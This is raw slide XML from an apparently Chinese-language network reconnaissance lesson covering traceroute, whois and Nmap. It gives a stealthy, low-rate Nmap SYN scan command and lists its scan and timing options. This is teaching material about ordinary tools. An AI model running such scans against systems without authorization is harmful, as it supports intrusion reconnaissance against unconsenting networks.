      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="88" grpId="2"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="795336" y="509586"/>
            <a:ext cx="447598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traceroute：路由测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="94" name="image9.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619250" y="1733550"/>
            <a:ext cx="9982200" cy="5511800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Shape 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5112258" y="560386"/>
            <a:ext cx="467258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Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>（Windows命令：tracert）</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3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="10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95"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="2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94"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="600" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="94"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="600" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="93" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="94" grpId="3"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564177" y="758824"/>
            <a:ext cx="1187485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whois:是用来查询域名的IP以及所有者等信息的传输协议等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98" name="image10.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2038350" y="1765300"/>
            <a:ext cx="8928100" cy="8394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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1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98"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="600" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="98"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="600" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="97"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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163637" y="164306"/>
            <a:ext cx="11214202" cy="2552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Nmap:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>不仅可以确定存活状态，在许多情况下，还能确定主机</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>的操作系统，监听的端口，服务，还有可能获得用户的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>证书。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Shape 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3369786" y="4552950"/>
            <a:ext cx="626364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nmap -sS -T2 192.168.0.1 -oN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102" name="image11.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="2154236" y="5564187"/>
            <a:ext cx="1871664" cy="352427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Shape 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1985962" y="6330155"/>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命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104" name="image12.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="3841750" y="3967162"/>
            <a:ext cx="1466850" cy="352427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Shape 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3135312" y="3013074"/>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扫描选项</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Shape 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5799137" y="6330155"/>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计时选项</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107" name="image13.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="14777088">
            <a:off x="5565775" y="5681662"/>
            <a:ext cx="1431925" cy="352427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="108" name="image14.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6913561" y="3971925"/>
            <a:ext cx="1196977" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Shape 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6997700" y="2909092"/>
            <a:ext cx="1028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目标</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110" name="image15.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="15480352">
            <a:off x="8790781" y="5558630"/>
            <a:ext cx="1141414" cy="352427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Shape 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8629650" y="6330155"/>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输出选项</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Shape 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4907807" y="8153399"/>
            <a:ext cx="318759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Nmap命令结构</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32" presetID="4" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="109"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="3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32" presetID="4" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="105"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="3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32" presetID="4" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="104"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="104"/>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32" presetID="4" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="108"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="108"/>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4" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="101"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="101"/>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32" presetID="4" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="110"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="3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32" presetID="4" grpId="8" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="102"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="102"/>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32" presetID="4" grpId="9" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="107"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="107"/>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32" presetID="4" grpId="10" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="103"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="103"/>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32" presetID="4" grpId="11" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="55" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="106"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="106"/>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32" presetID="4" grpId="12" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="60" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="111"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="3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32" presetID="4" grpId="13" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="65" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="112"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="3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12"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="108" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="105" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="103" grpId="10"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="112" grpId="13"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="110" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="106" grpId="11"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="102" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="109" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="101" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="100" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="107" grpId="9"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="104" grpId="4"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392111" y="908049"/>
            <a:ext cx="2527403"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扫描选项：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-sS 隐蔽扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-sT TCP输出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-sU UDP输出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-sA ACP输出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Shape 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3935412" y="1741487"/>
            <a:ext cx="240921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685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-T0 Paranoid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-T1 Sneaky</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-T2 polite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-T3 Normal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-T4 Aggressive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-T5 Insane</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Shape 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7772400" y="1502568"/>
            <a:ext cx="2819781"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685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
